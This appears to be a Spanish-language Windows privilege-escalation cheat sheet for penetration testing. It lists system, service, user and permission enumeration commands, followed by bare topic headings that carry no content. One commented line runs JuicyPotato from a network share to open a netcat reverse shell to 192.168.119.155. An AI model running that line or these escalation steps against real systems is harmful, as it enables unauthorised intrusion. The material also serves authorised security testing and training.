Enumeracion de Windows

Verificar el Sistema Operativo, Nivel de Parche, Básico

systeminfo
Systeminfo | findstr /B /C:"OS Name" /C:"System Type" etc ..

## Actualizaciones
wmic qfe get Caption,Description,HotFixID,InstalledOn
Wmic logicaldisk get caption,description

## Aplicaciones
wmic product get name, version, vendor
accesschk.exe -uws "Everyone" "C:\Program Files"
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

## Servicios
sc query state=all | findstr "SERVICE_NAME:"
wmic service get name,displayname,pathname,startmode
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

## Volumen
mountvol

## Drivers (en PowerShell)
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

whoami
echo %USERNAME%
whoami /priv
whoami /groups
whoami /all
# Si el usuario tiene privilegios SeImpersonate
# \\192.168.119.155\test\juicy.exe -l 4444 -p c:\windows\system32\cmd.exe -a "/c \\192.168.119.155\test\nc.exe -e cmd.exe 192.168.119.155 4447" -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9}

net user
net localgroup
net user /domain
net group /domain
net group /domain <Group Name>

Firewall / AV / Defender

Red

Herramientas Automatizadas de Checklist

Aplicaciones y Servicios Instalados

Tareas Programadas

Inicios y Autoruns

Permisos de Servicio

Verificar si se puede modificar la configuración del servicio.

Verificar servicios con permisos de archivo débiles.

Ruta de Servicio Sin Citar

AlwaysInstallElevated

Servicio Disponible Solo Desde el Interior

Contraseñas en Archivos

Verificar savecred.

¿Podemos encontrar algún archivo SAM?

Configuración Desatendida

Registro

VNC

Autologin en Windows

Parámetros de SNMP

Putty

Buscar contraseña en el registro

REGSVC ACL

Explotación de Ruta de Servicio Sin Citar

Explotación de Permisos de Servicio Débiles

Explotación de Permisos Débiles del Registro

Explotación de Permisos Débiles del Archivo Ejecutable del Servicio

Escalación de Privilegios AlwaysInstallElevated

Secuestro de DLL

Credenciales almacenadas

Obtener contraseñas del registro de Windows

Buscar contraseñas en el registro

Archivos que pueden contener contraseñas

Encontrar todos los permisos de carpetas débiles por unidad.

Encontrar todos los permisos de archivos débiles por unidad.

Última actualización

¿Te fue útil?